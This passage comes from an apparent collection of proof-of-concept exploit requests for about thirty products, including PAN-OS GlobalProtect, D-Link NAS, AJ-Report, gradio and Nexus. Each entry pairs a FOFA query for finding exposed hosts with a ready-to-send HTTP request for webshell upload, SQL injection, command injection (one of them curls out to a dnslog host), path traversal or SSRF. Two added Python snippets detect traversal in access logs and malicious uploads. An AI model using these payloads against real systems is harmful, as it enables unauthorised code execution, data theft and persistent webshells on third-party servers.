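CVE-2024-27198 and CVE-2024-27199 above, like the aiohttp (126), ColdFusion (129) and RaidenMAILD (147) requests in this section, work because the component that enforces authentication sees a different path than the component that serves the resource: a ;.jsp path-parameter suffix on the forwarded jsp value, a .. segment after a prefix that is exempt from login, or a traversal sequence inside a file_name parameter. The example below is added here and is not TeamCity's or the page's code: it canonicalises a request target the way a defender's log filter should before comparing it against protected prefixes, and reports only requests whose canonical form differs from what was literally asked for or that arrive through a forward parameter. The protected prefixes, the list of forward parameters and the access-log lines are assumptions; the log lines are constructed from the request targets shown in this section.

```python
import posixpath
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Paths that must never be served without a session (assumed for the example).
PROTECTED_PREFIXES = ("/admin/", "/app/rest/", "/etc/", "/windows/")

# Query parameters that the affected products treat as a file or forward target (assumed).
FORWARD_PARAMS = ("jsp", "file_name")


def canonical(path: str) -> str:
    """Percent-decode, drop ';param' suffixes from each segment, resolve '..'.

    Decoding repeats until stable so %252e%252e does not survive; the result
    is forced absolute so normpath clamps '..' at the root instead of letting
    it escape.
    """
    prev = None
    while prev != path:
        prev, path = path, unquote(path)
    segments = [segment.split(";", 1)[0] for segment in path.split("/")]
    joined = "/".join(segments)
    if not joined.startswith("/"):
        joined = "/" + joined
    return posixpath.normpath(joined)


def protected_hits(target: str) -> list:
    """Canonical protected paths that a request target reaches indirectly."""
    parts = urlsplit(target)
    candidates = [(parts.path, "path")]
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key in FORWARD_PARAMS:
            candidates.append((value, f"param:{key}"))
    hits = []
    for raw, origin in candidates:
        canon = canonical(raw)
        if not any(canon.startswith(prefix) for prefix in PROTECTED_PREFIXES):
            continue
        # A literal request for a protected path is the application's normal
        # authentication case; report only paths reached through a parameter
        # or through a form that canonicalisation changed.
        if origin == "path" and canon == raw:
            continue
        hits.append(canon)
    return hits


REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def scan_access_log(lines):
    """Yield (line_number, canonical_path) for requests that reach a protected path."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_LINE.search(line)
        if match:
            for canon in protected_hits(match.group("target")):
                yield number, canon


# Constructed access-log lines; the request targets are the ones shown in this section.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Mar/2024:10:00:00 +0000] "POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Mar/2024:10:00:01 +0000] "GET /res/../admin/diagnostic.jsp HTTP/1.1" 200 9000',
    '10.0.0.5 - - [01/Mar/2024:10:00:02 +0000] "GET /.well-known/acme-challenge/../../admin/diagnostic.jsp HTTP/1.1" 200 9000',
    '10.0.0.6 - - [01/Mar/2024:10:00:03 +0000] "GET /static/../../../../../etc/passwd HTTP/1.1" 200 1800',
    '10.0.0.7 - - [01/Mar/2024:10:00:04 +0000] "GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1" 200 1800',
    '10.0.0.8 - - [01/Mar/2024:10:00:05 +0000] "GET /webeditor/../../../windows/win.ini HTTP/1.1" 200 400',
    '10.0.0.9 - - [01/Mar/2024:10:00:06 +0000] "GET /app/rest/server HTTP/1.1" 401 0',
    '10.0.0.9 - - [01/Mar/2024:10:00:07 +0000] "GET /res/img/logo.png HTTP/1.1" 200 3000',
]

if __name__ == "__main__":
    for number, canon in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: reaches {canon}")
```

Run it over a real access log by replacing SAMPLE_LOG with the file's lines; the 401 on a literal /app/rest/ request and the static image under /res/ are the two shapes that must stay quiet, otherwise the filter is just a prefix grep.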
133. H5 Cloud Mall (H5云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun (福建科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun (福建科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun (福建科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun (福建科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun (福建科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
Credentials: admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to execute, base64-encoded (aWQ= decodes to id).
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}<dnslog address>`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

The url parameter is base64 for rtsp://a (plus a newline); transport URL-decodes to || (echo '[S]'; id; echo '[E]')#; so the output of id appears between the [S] and [E] markers in the response.

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass / server-side template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

The ;swagger-ui/ path segment bypasses the authentication filter; the validationRules value is a JavaScript function evaluated server-side with access to Java classes, hence the ProcessBuilder call.

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

The published request only shows the unauthenticated endpoint reached through the ;swagger-ui/ segment; the injected parameter is not part of this PoC.

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter, i.e. Basic-auth credentials whose username part carries the shell injection ';ls;' and whose password is irrelevant.
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: have the server copy /etc/passwd into a temporary file (component_id is one of the ids from step 1)
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: fetch the copy from the cache path returned in step 2
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwei'er (天维尔) fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

Time-based blind injection in query.gsdwid against a PostgreSQL backend (PG_SLEEP); a 5-second delay confirms it.

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

The uploaded file is then reachable at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

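The uploads in 121, 130, 133 and this entry all succeed for the same reason: the handler stores whatever filename the client declares, and in 130 and 155 the client also declares image/png for a PHP file. The example below is added here and is not taken from the page or from any of these products; it parses a multipart/form-data body with Python's standard email parser and reports the three checks a safe upload handler makes on every file part (script extension, server-side code markers in the bytes, and declared image type versus actual magic bytes). The extension and signature lists are assumptions; the sample bodies are constructed from the bodies shown in 121 and 130 plus a constructed benign JPEG upload.

```python
from email import message_from_bytes
from email.policy import HTTP

# Extensions an upload handler must never persist under a web root (assumed policy).
SCRIPT_EXTENSIONS = {"php", "phtml", "php5", "jsp", "jspx", "asp", "aspx", "ashx"}
# Byte patterns that mark server-side code whatever the declared type says.
CODE_SIGNATURES = (b"<?php", b"<?=", b"<%")
# Magic bytes the declared image types must begin with.
IMAGE_MAGIC = {
    "image/png": b"\x89PNG",
    "image/jpeg": b"\xff\xd8\xff",
    "image/gif": b"GIF8",
}


def parse_multipart(content_type: str, body: bytes) -> list:
    """One dict per part: field name, filename, declared type, raw payload bytes."""
    # The email parser wants the Content-Type header (with the boundary) in front of the body.
    raw = b"Content-Type: " + content_type.encode("ascii") + b"\r\n\r\n" + body
    message = message_from_bytes(raw, policy=HTTP)
    parts = []
    for part in message.iter_parts():
        parts.append({
            "name": part.get_param("name", header="content-disposition"),
            "filename": part.get_filename(),
            "declared_type": part.get_content_type(),
            "payload": part.get_payload(decode=True) or b"",
        })
    return parts


def upload_findings(content_type: str, body: bytes) -> list:
    """(filename, reason) for every file part a safe upload handler must reject."""
    findings = []
    for part in parse_multipart(content_type, body):
        filename = part["filename"]
        if not filename:
            continue                      # a plain form field, not a file
        extension = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
        payload = part["payload"]
        if extension in SCRIPT_EXTENSIONS:
            findings.append((filename, f"server-side script extension .{extension}"))
        if any(signature in payload for signature in CODE_SIGNATURES):
            findings.append((filename, "payload contains server-side code markers"))
        magic = IMAGE_MAGIC.get(part["declared_type"])
        if magic is not None and not payload.startswith(magic):
            findings.append((filename, f"declared {part['declared_type']} but the bytes are not that format"))
    return findings


def _body(boundary: str, *parts: bytes) -> bytes:
    """Assemble a multipart/form-data body from already-formatted parts (headers + blank line + data)."""
    delimiter = b"--" + boundary.encode("ascii")
    return b"".join(delimiter + b"\r\n" + part + b"\r\n" for part in parts) + delimiter + b"--\r\n"


# Constructed from the Laykefu request (entry 130): a PHP file declared as image/png.
BOUNDARY_130 = "----WebKitFormBoundary3OCVBiwBVsNuB2kR"
CT_130 = f"multipart/form-data; boundary={BOUNDARY_130}"
BODY_130 = _body(BOUNDARY_130,
    b'Content-Disposition: form-data; name="file"; filename="1.php"\r\n'
    b"Content-Type: image/png\r\n\r\n"
    b"<?php phpinfo();@eval($_POST['sec']);?>")

# Constructed from the S42 request (entry 121): a PHP file plus an ordinary form field.
BOUNDARY_121 = "---------------------------42328904123665875270630079328"
CT_121 = f"multipart/form-data; boundary={BOUNDARY_121}"
BODY_121 = _body(BOUNDARY_121,
    b'Content-Disposition: form-data; name="web_img"; filename="1.php"\r\n'
    b"Content-Type: application/octet-stream\r\n\r\n"
    b"<?php phpinfo();?>",
    b'Content-Disposition: form-data; name="id_type"\r\n\r\n'
    b"1")

# A benign JPEG avatar (constructed): declared type and magic bytes agree.
CT_OK = CT_130
BODY_OK = _body(BOUNDARY_130,
    b'Content-Disposition: form-data; name="file"; filename="avatar.jpg"\r\n'
    b"Content-Type: image/jpeg\r\n\r\n"
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01")

if __name__ == "__main__":
    for label, ct, body in [("130", CT_130, BODY_130), ("121", CT_121, BODY_121), ("ok", CT_OK, BODY_OK)]:
        print(label, upload_findings(ct, body))
```

The order of the checks matters less than doing all three: an extension check alone is defeated by a handler that renames to the declared type, and a magic-bytes check alone is defeated by a polyglot that starts with a valid image header and carries the PHP tag further in.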
156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
Affected: TBK DVR-4104, TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

The mdc value URL-decodes to: echo; echo asrgkjh0 > /var/example.txt; ls -l /var; echo ----------------; cat /var/example.txt;

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) PACS WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
